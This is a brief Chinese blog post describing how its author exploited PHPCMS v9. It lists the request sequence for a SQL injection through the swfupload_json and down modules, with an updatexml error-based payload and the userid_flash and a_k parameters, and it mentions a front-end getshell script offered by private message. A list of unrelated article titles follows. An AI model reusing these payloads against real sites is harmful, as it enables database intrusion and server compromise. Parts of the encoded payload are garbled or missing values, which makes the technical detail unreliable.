phpcms9 从注入点入手和 从前台getshell
2024-09-04 20:33:50
弄了3天了 这个点 总结一下这三天的坑吧
0X01 注入点入手
/index.php?m=wap&c=index&a=init&siteid=1 获取cookie
传给
userid_flash=686dzK2pLsN_cv_pbJlCjvsm-ex_mCiOG90mXzt4
然后 构造SQL语句
/index.php?m=attachment&c=attachments&a=swfupload_json&aid=&src=%26id=%*+and+updatexml(%2cconcat(%2c((select+@@datadir+limit+%2c1)))%2c1)%%26m%3d1%26f%3dhaha%26modelid%3d2%26catid%3d7%
得到cookie
在构造传给a_k参数
/index.php?m=content&c=down&a_k=
2前台getshell附件在我的机器里面 要得可以私信我 py脚本
太菜了 多学习
最新文章
- linux sed命令详解
- DSY3163*Eden的新背包问题
- [django]django xlrd处理xls中日期转换问题
- javascript学习之带滚动条的图片
- iOS开发 - OC - 苹果为大家提供的后台:CloudKit 的简单使用
- 2014Ember带来怎样的变化?
- 【Unity Shaders】学习笔记——SurfaceShader(十)镜面反射
- Tutorial: Model
- Java流操作之转换流
- ETL构建数据仓库五步法
- 习WebSocket一(WebSocket初识)[转]
- Transparent Application Failover 透明应用切换
- Python实战之SocketServer模块
- Konckout第四个实例:组合类型数据绑定 -- 日期双向绑定显示
- 1082. Read Number in Chinese (25)
- input date 赋值的坑及改变时如何获取 input date的值
- SpringMVC框架二:SpringMVC与MyBatis整合
- webstrom 使用sass的环境配置说明
- linux 逆向映射机制浅析
- [No0000E6]C# 判断与循环